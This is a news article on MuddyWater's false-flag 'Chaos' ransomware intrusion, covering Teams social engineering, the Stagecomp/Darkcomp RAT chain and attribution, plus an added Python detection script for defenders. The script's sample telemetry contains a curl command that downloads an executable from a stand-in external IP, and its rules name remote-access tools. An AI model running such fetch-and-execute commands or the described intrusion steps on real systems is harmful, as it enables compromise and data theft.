Iranian State-Sponsored Hackers MuddyWater Accused of “False Flag” Ransomware Attack
The Iranian state-sponsored hacking group MuddyWater, also known by aliases such as Mango Sandstorm, Seedworm, and Static Kitten, has been implicated in a recent ransomware attack that cybersecurity researchers are describing as a “false flag” operation. The sophisticated cyberattack, observed in early 2026, employed social engineering tactics via Microsoft Teams to initiate its infection sequence. While initial indicators suggested the involvement of a ransomware-as-a-service (RaaS) group operating under the “Chaos” brand, further analysis points to a targeted, state-backed operation masquerading as opportunistic extortion.
This incident highlights a concerning trend where state-sponsored actors leverage the cybercriminal underground to obscure their origins and complicate attribution efforts. The attack’s methodology, which bypassed traditional ransomware encryption in favor of data exfiltration and long-term persistence, suggests a strategic objective beyond simple financial gain.
High-Touch Social Engineering and Deceptive Tactics
According to a report shared with The Hacker News by cybersecurity firm Rapid7, the campaign involved a “high-touch social engineering phase conducted via Microsoft Teams.” Attackers used interactive screen-sharing sessions to harvest credentials and manipulate the multi-factor authentication (MFA) flow. Once inside victim networks, the group did not proceed with the typical ransomware workflow of encrypting files.
Instead, the attackers focused on data exfiltration and establishing enduring presence within the compromised environment using remote management tools like DWAgent. This deviation from standard ransomware operations has led researchers to believe the ransomware component may have served primarily as a distraction or obfuscation tool, rather than the core objective.
The findings suggest that MuddyWater’s strategy involves an increasing reliance on off-the-shelf tools readily available within the cybercrime ecosystem. This aligns with previous observations from threat intelligence firms like Ctrl-Alt-Intel, Broadcom, Check Point, and JUMPSEC, which have documented the adversary’s utilization of tools such as CastleRAT and Tsundere.
This is not the first instance of MuddyWater engaging in ransomware-related activities. In September 2020, the group was linked to a campaign targeting Israeli organizations with a loader named PowGoop, which deployed a destructive variant of the Thanos ransomware. More recently, in 2023, Microsoft revealed that MuddyWater collaborated with DEV-1084, a threat actor known for using the DarkBit persona, to conduct destructive attacks under the guise of ransomware deployment. In October 2025, evidence emerged suggesting the group used the Qilin ransomware against an Israeli government hospital.
Check Point previously noted that such tactics allow Iranian-affiliated operators to adopt criminal ransomware brands and methods associated with the broader extortion market while serving strategic Iranian objectives. Ransomware affiliate programs potentially provide a layer of cover and plausible deniability, particularly as Israeli authorities have tightened defenses.
The Chaos Ransomware-as-a-Service (RaaS) Framework
The “Chaos” RaaS group emerged in early 2025 and is known for its double extortion model. The group advertises its affiliate program on cybercrime forums like RAMP and RehubCom. Their attacks typically involve mail flooding and vishing (voice phishing) via Teams, often impersonating IT support to trick victims into installing remote access tools such as Microsoft Quick Assist. This initial foothold is then leveraged to penetrate deeper into the victim’s infrastructure and deploy ransomware.
Chaos has also been observed employing triple extortion tactics, which include threatening distributed denial-of-service (DDoS) attacks against the victim’s infrastructure. The RaaS model reportedly offers these capabilities as bundled services to its affiliates. Furthermore, indications suggest the group may engage in quadruple extortion, threatening to contact customers or competitors to increase pressure on victims.
As of late March 2026, Chaos has claimed responsibility for attacks on 36 victims, with the majority located in the U.S. Prominent sectors targeted include construction, manufacturing, and business services. In the specific intrusion analyzed by Rapid7, the threat actor initiated external chat requests via Teams, engaging employees to gain initial access through screen-sharing sessions. Compromised user accounts were then used for reconnaissance, establishing persistence with tools like DWAgent and AnyDesk, lateral movement, and data exfiltration, followed by ransom negotiations via email.
During compromised sessions, the threat actor reportedly executed discovery commands, accessed VPN configuration files, and prompted users to type their credentials into locally created text files. In at least one instance, the attacker deployed AnyDesk for additional access. Over an RDP session, the threat actor also used the curl utility to download an executable, “ms_upd.exe,” from an external server. This binary initiates a multi-stage infection chain that delivers additional malicious components.
Malware Families Involved
- ms_upd.exe (aka Stagecomp): Collects system information and communicates with a command-and-control (C2) server to deploy subsequent payloads: game.exe, WebView2Loader.dll, and visualwincomp.txt.
- game.exe (aka Darkcomp): A bespoke remote access trojan (RAT) disguised as a legitimate Microsoft WebView2 application. It’s a trojanized version of the official Microsoft WebView2APISample project.
- WebView2Loader.dll: A legitimate DLL downloaded by ms_upd.exe, required by Microsoft Edge WebView2 for embedding web content in Windows applications.
- visualwincomp.txt: An encrypted configuration file used by the RAT to retrieve C2 information.
The RAT connects to the C2 server and enters an indefinite loop, polling for new commands every 60 seconds. This allows it to execute commands and PowerShell scripts, perform file operations, and spawn interactive cmd.exe shells or PowerShell sessions.
The connection to MuddyWater stems from the code-signing certificate used to sign “ms_upd.exe,” which carries the subject name “Donald Gay.” The same certificate has previously been used by the threat cluster to sign its malware, including Fakeset, a CastleLoader downloader.
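As an added example (not code from the Rapid7 report or from this article), the following Python hunts for the chain described in the two sections above in Sysmon-style process-creation and network-connection records: curl writing an executable to disk, a binary whose Authenticode signer is “Donald Gay,” an unsanctioned remote management tool such as DWAgent or AnyDesk starting in a user session, and a process connecting to one destination at a fixed 60-second interval. The event records, user name, IP addresses and timestamps are constructed for the example; only the signer name and the file names ms_upd.exe and game.exe come from the page.

```python
"""Added example: hunt for the intrusion chain described above in Sysmon-style
EventID 1 (process create) and EventID 3 (network connect) records.

All telemetry below is constructed for illustration. Field names follow Sysmon
conventions; the signer "Donald Gay" and the names ms_upd.exe / game.exe come
from the article, while hosts, IPs, users and timestamps are made up.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import pstdev

# Subject names on code-signing certificates the page ties to MuddyWater tooling.
SUSPECT_SIGNERS = {"donald gay"}
# Remote management tools seen in the intrusion. A real deployment would remove
# the ones IT legitimately uses (assumption: none are sanctioned here).
RMM_IMAGES = {"dwagent.exe", "dwagsvc.exe", "anydesk.exe", "quickassist.exe"}
# curl writing a Windows executable to disk, i.e. a download cradle.
CURL_EXE_DOWNLOAD = re.compile(r"(?:-o|--output)\s+\S+\.exe\b", re.IGNORECASE)
TS_FMT = "%Y-%m-%d %H:%M:%S"


def image_name(path):
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect_process(ev):
    """Return (rule, detail) hits for one process-creation record."""
    hits = []
    img = image_name(ev["Image"])
    cmd = ev.get("CommandLine", "")
    if img == "curl.exe" and CURL_EXE_DOWNLOAD.search(cmd):
        hits.append(("curl_exe_download", cmd))
    if ev.get("Signature", "").lower() in SUSPECT_SIGNERS:
        hits.append(("suspect_code_signer", f'{img} signed by {ev["Signature"]}'))
    if img in RMM_IMAGES:
        hits.append(("remote_mgmt_tool", f'{img} launched by {ev.get("User", "?")}'))
    return hits


def detect_beacons(net_events, expected=60, tolerance=5, min_conns=4):
    """Flag (image, destination) pairs that connect at a near-constant interval.
    A poll loop with no jitter, like the 60-second C2 loop the article
    describes, yields gaps whose mean sits at the interval and whose spread
    is close to zero."""
    by_pair = defaultdict(list)
    for ev in net_events:
        key = (image_name(ev["Image"]), ev["DestinationIp"])
        by_pair[key].append(datetime.strptime(ev["UtcTime"], TS_FMT))
    beacons = []
    for (img, dst), times in by_pair.items():
        if len(times) < min_conns:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = sum(gaps) / len(gaps)
        if abs(mean - expected) <= tolerance and pstdev(gaps) <= tolerance:
            beacons.append((img, dst, round(mean, 1)))
    return beacons


def hunt(events):
    """Run all rules over a mixed event list; returns (rule, detail) tuples."""
    findings = [h for e in events if e["EventID"] == 1 for h in detect_process(e)]
    net = [e for e in events if e["EventID"] == 3]
    for img, dst, gap in detect_beacons(net):
        findings.append(("fixed_interval_beacon", f"{img} -> {dst} every {gap}s"))
    return findings


# Constructed sample telemetry: one compromised user session plus benign noise.
SAMPLE_EVENTS = [
    {"EventID": 1, "UtcTime": "2026-03-10 09:02:11", "User": "CORP\\jdoe",
     "Image": "C:\\Windows\\System32\\curl.exe",
     "CommandLine": "curl.exe http://198.51.100.7/ms_upd.exe -o C:\\Users\\jdoe\\ms_upd.exe"},
    {"EventID": 1, "UtcTime": "2026-03-10 09:02:40", "User": "CORP\\jdoe",
     "Image": "C:\\Users\\jdoe\\ms_upd.exe", "CommandLine": "ms_upd.exe",
     "Signature": "Donald Gay", "SignatureStatus": "Valid"},
    {"EventID": 1, "UtcTime": "2026-03-10 09:05:02", "User": "CORP\\jdoe",
     "Image": "C:\\ProgramData\\DWAgent\\dwagent.exe", "CommandLine": "dwagent.exe"},
    {"EventID": 1, "UtcTime": "2026-03-10 09:06:30", "User": "CORP\\jdoe",
     "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE",
     "CommandLine": "OUTLOOK.EXE", "Signature": "Microsoft Corporation"},
]
_base = datetime.strptime("2026-03-10 09:03:00", TS_FMT)
# game.exe polling its C2 every 60 seconds with no jitter ...
SAMPLE_EVENTS += [{"EventID": 3, "UtcTime": (_base + timedelta(seconds=60 * i)).strftime(TS_FMT),
                   "Image": "C:\\Users\\jdoe\\game.exe", "DestinationIp": "203.0.113.10"}
                  for i in range(6)]
# ... and a browser with irregular traffic that must not be flagged.
SAMPLE_EVENTS += [{"EventID": 3, "UtcTime": (_base + timedelta(seconds=s)).strftime(TS_FMT),
                   "Image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe",
                   "DestinationIp": "198.51.100.20"}
                  for s in (3, 9, 140, 141, 300)]

if __name__ == "__main__":
    for rule, detail in hunt(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

Two caveats for anyone adapting this: the signer check matches only the exact subject name, so a new certificate issued to a different shell identity would pass it, and the beacon rule keys on the zero-jitter loop the article describes, so an implant that randomizes its sleep would need a looser tolerance or a different statistic. The RMM list should also be reconciled against whatever remote-support tooling the organization actually sanctions, or it will page on every legitimate helpdesk session.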
Blurring Lines Between State Actors and Cybercriminals
These findings underscore the increasing convergence of state-sponsored intrusion activities and cybercriminal tradecraft. This convergence aims to obscure attribution and delay defensive responses, making it harder for organizations and governments to identify and counter threats effectively.
The use of a RaaS framework in this context is seen as a deliberate strategy to blur the distinctions between state-sponsored activity and financially motivated cybercrime, thereby complicating attribution. Furthermore, the inclusion of extortion and negotiation elements can direct defensive efforts toward immediate impact, potentially delaying the identification of underlying persistence mechanisms established through tools like DWAgent or AnyDesk.
The apparent absence of file encryption, despite the presence of Chaos ransomware artifacts, represents a significant deviation from typical ransomware behavior. This inconsistency suggests the ransomware component might have functioned primarily as a facilitating or obfuscation mechanism rather than the primary objective of the intrusion.
This development coincides with reports from Hunt.io detailing an Iranian-nexus operation targeting Omani government institutions, leading to the exfiltration of over 26,000 Ministry of Justice user records, judicial case data, and SAM and SYSTEM registry hives. An open directory on a RouterHosting VPS in the United Arab Emirates exposed an active intrusion campaign against the Omani government, with the intrusion toolkit, C2 code, session logs, and exfiltrated data left openly accessible.
The discovery also aligns with continued activity from pro-Iran-aligned hacktivist groups. For instance, Handala Hack has claimed to have published details on nearly 400 U.S. Navy personnel in the Persian Gulf and conducted an attack on the Port of Fujairah in the United Arab Emirates, allegedly accessing internal systems and leaking approximately 11,000 sensitive documents including invoices, shipping records, and customs documents.
Sergey Shykevich, group manager at Check Point Research, stated that a recent documented escalation in Iranian-linked cyber operations, including surveillance, data leaks, and a rise in regional attack volume, was likely to be followed by further escalation. He characterized the claimed attack on the Port of Fujairah as such an escalation, noting a shift in the threat’s nature from intelligence gathering or public embarrassment to potentially enabling physical missile targeting. Shykevich emphasized the explicit connection between cyber and kinetic domains and predicted continued, intensified cyber activity following periods of reduced physical engagement.
The evolving tactics employed by groups like MuddyWater, utilizing RaaS frameworks and sophisticated social engineering, present a significant challenge for cybersecurity defenders. The ability of state actors to leverage the criminal ecosystem not only complicates attribution but also introduces more complex attack vectors with potentially far-reaching strategic implications.